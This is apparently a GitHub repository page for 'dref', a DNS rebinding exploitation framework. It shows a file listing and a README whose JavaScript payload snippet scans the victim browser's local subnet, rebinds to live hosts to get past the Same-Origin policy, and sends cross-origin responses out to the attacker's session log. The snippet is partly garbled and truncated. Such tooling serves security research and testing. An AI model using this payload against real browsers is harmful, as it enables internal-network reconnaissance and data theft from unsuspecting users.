Skip to content
DNS Rebinding Exploitation Framework
JavaScript Other
Branch: master
Clone or download

Latest commit


Type Name Latest commit message Commit time
Failed to load latest commit information.
docs/img move www Jun 27, 2018
dref disable chrome's dns flushing Oct 26, 2019
.gitignore fix ignore paths Jun 26, 2018
.travis.yml set path to node_modules Jun 27, 2018 Update Aug 29, 2019
docker-compose-dev.yml initial commit Jun 26, 2018
docker-compose.yml Robust fast rebind (#51) Oct 26, 2019
dref-config.yml merge iptables-fast-rebind Sep 1, 2018
greenkeeper.json chore: add Greenkeeper config file Jun 27, 2018
iptables-node-alpine.Dockerfile merge iptables-fast-rebind Sep 1, 2018

DNS Rebinding Exploitation Framework

dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:

// mainFrame() runs first
async function mainFrame () {
  // We use some tricks to derive the browser's local /24 subnet
  const localSubnet = await network.getLocalSubnet(24)

  // We use some more tricks to scan a couple of ports across the subnet
  netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
    // We launch the rebind attack on live targets
    for (let h of results.hosts) {
      for (let p of h.ports) {
        if ( session.createRebindFrame(, p.port)

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
  // After this we'll have bypassed the Same-Origin policy
  session.triggerRebind().then(() => {
    // We can now read the response across origin...
    network.get(session.baseURL, {
      successCb: (code, headers, body) => {
        // ... and exfiltrate it
        session.log({code: code, headers: headers, body: body})

Head over to the Wiki to get started or check out dref attacking headless browsers for a practical use case.

This is a development release - do not use in production

You can’t perform that action at this time.